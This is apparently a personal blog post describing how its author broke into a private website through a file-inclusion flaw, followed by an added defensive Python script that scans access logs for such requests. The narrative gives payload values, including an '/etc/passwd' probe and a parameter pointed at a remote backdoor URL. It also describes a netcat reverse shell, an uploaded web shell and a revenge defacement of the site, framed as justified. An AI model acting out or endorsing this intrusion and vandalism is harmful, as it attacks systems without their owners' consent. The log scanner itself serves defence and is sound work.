This is the story of how I hacked a private website and all I got was a police threat instead of thanks or a bounty for the vulnerability report. It was a hot day and I was totally bored. To tackle my boredom, I decided to do some research on web security. So, I selected a target, which was a private website. The test began with my own tool, Scrab The Web (STW for short), which automates the process of web hacking, finding vulnerabilities and exploiting them in a different way. After 10 minutes I read the status of the website and started checking for vulnerabilities manually.
I was shocked when I opened a page URL like .php?inc=. I tried to exploit local file inclusion but didn’t find any LFI vulnerability. It was a complete headache. The real structure of that parameter was php?inc=show.php. I changed it to php?inc=/etc/passwd, I even tried LFI exploiter tools and tried WAF bypass, but failed. I changed the value php?inc=show.php to index.php and it showed index.php in that page. Again I was shocked: the developer used the file_get_contents() function.
An evil idea came to my mind: I changed the parameter to my backdoor link, like php?inc=https://sprotechs.com/backdoor.php. I started netcat and tried to back-connect using the reverse shell backdoor, and I got a session. I was able to read, write and change files. Simply, I uploaded a shell and reported it to the administration. After a couple of hours, I received their message, which was “Don’t exploit or steal user credentials, or we will inform the police”. It broke my heart and I defaced the website.
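Added example, not part of the original post or the site's code: a defender-side check that scans web access logs for requests like the ones described above, where the inc parameter carries anything other than the expected file name. The log lines, the page name page.php, the allowlist and the example.test host are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

ALLOWED_INC = {"show.php"}  # assumption: the only value the site itself sends
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*:", re.I)  # any scheme prefix

# Constructed access-log lines (documentation IPs, placeholder page name).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /page.php?inc=show.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /page.php?inc=/etc/passwd HTTP/1.1" 200 0',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /page.php?inc=index.php HTTP/1.1" 200 2048',
    '203.0.113.7 - - [01/Jan/2024:10:00:14 +0000] "GET /page.php?inc=https://example.test/x.php HTTP/1.1" 200 64',
    '203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /page.php?inc=%252e%252e%252fconfig.php HTTP/1.1" 200 0',
]

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding so the checks see the final value."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify_inc(value):
    """Return a finding label for an 'inc' value, or None if it is expected."""
    v = fully_decode(value).strip()
    if SCHEME_RE.match(v) or v.startswith("//"):
        return "remote-url"
    if v.startswith(("/", "\\")) or ".." in v:
        return "path-outside-webroot"
    if v not in ALLOWED_INC:
        return "unexpected-file"
    return None

def scan(log_lines):
    """Return (client_ip, inc_value, finding) for each suspicious request."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for key, value in parse_qsl(urlsplit(m.group(1)).query):
            if key == "inc" and (finding := classify_inc(value)):
                hits.append((line.split(" ", 1)[0], value, finding))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same allowlist comparison belongs in the application itself, so that a request parameter is never passed to a file-reading function unchecked.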